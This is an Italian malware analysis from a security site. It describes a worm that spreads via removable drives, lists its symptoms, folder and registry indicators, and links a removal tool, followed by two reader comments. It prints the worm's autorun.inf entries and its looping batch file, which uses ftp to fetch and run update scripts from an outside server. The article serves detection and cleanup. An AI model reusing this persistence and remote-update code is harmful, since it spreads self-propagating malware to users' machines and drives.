ago
18
WORM_QUICKBATC.K, un worm che infetta i dispositivi removibili.
Author - Filed Under Virus, Trojans & Worms
E’ un Worm che si propaga attraverso i dispositivi removibili (pen, HD, lettori Mp3, ecc) in grado a sua volta di infettare quelli puliti. Lo scorso anno un simile malware rendeva inutilizzabili i dispositivi removibili; differenti gli eseguibili ed i valori aggiunti nel registro, ma uguale il risultato ottenuto. reper.exe questo il nome dell’eseguibile lanciato dall’autorun
[autorun]
open=reper.exe
ma anche
[autorun]
open=RavMon.exe
un altro esempio, vecchio di due anni, lo possiamo trovare spiegato all’interno del seguente link http://www.securityfocus.com/archive/88/437703/30/360/threaded
La tecnica dell’infezione non si discosta di molto da quella descritta in questo articolo e presente in questa variante del malware. Entriamo nei dettagli e capiamo come scoprire se il nostro computer è stato infettato. Crediamo inoltre che questo malware possa avere origini italiane:
una volta infettati possiamo avere un primo messaggio a video
cmd.exe – Disco non presente
Impossibile trovare il disco nell’unità. Inserire un disco nell’unità X
Annulla – Riprova – Continua
seguito da
Windows – Disco non presente
“Exception Processing message c0000013 parameters 75b1bf9c 4 75b1bf9c”
Annulla – Riprova – Continua
cliccando su uno qualsiasi dei tasti, la finestra si ripresenta.
Se si ricevono questi avvisi, basta controllare se è presente la cartella
%WinDir%\Installer\24ha12
se c’è, allora siete infetti. Avendo salvato copie di se stesso nei dispositivi removibili e nell’HD, a poco servirebbe ripulire solo uno di questi due; il worm è in grado di riprodursi e eseguirsi. Questo è uno dei file batch creati dal worm e che punta a ripristinare l’infezione nel sistema:
@shift
:begin
set winH=%systemroot%\Installer\24ha12
if exist %winH%\inet\stp exit
if exist %winH%\inet\intupdate\intupdate.bat del /b %winH%\inet\intupdate\intupdate.bat
ftp -v -i -s:”%winH%\inet\int2com.txt” ftp.digiland.it
if not exist %winH%\inet\slp2.exe copy %myfiles%\sleep.exe, %winH%\inet\slp2.exe
start /b /wait %winH%\inet\slp2.exe 900
if exist %winH%\inet\intupdate\intupdate.bat call %winH%\inet\intupdate\intupdate.bat
goto begin
questo è il contenuto dell’autorun.inf:
action= Apri cartella per visualizzare i file
shell\Auto\command=hvNrtID.exe
shell=Auto
dove la directory
%myfiles% è %UserProfile%\Impostazioni locali\Data applicazioni
e i files hvNrtID.exe e autorun.inf si trovano sia nelle unità removibili infette che nell’HD. Per poter essere eseguito all’avvio aggiunge i seguenti valori
N_prog=%SysDir%\N_prog.exe
str_insDr=%WinDir%\Installer\24ha12\Ic2d\str_insDr.exe
in
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Per rimuoverlo è stato creato da SuspectFile un fix_tool. Il tool è prelevabile all’interno del nostro forum nella sezione “Tools” visitando questa discussione: http://www.suspectfile.com/forum/viewtopic.php?f=8&t=2544
Deifobe & amvinfe
Ho il problema descritto in precedenza (virus RavMon). Ho lanciato il pen tool ma ogni volta che provo ad accedere al disco esterno il ottengo il messaggio
“impossibile trovare RavMon.exe”
Come faccio ad eliminare il problema?
Ciao Michele e benvenuto,
per un aiuto iscriviti nel nostro forum, per favore, ed apri una discussione.
http://www.suspectfile.com/forum/viewforum.php?f=4
Grazie
Ciao,
Marco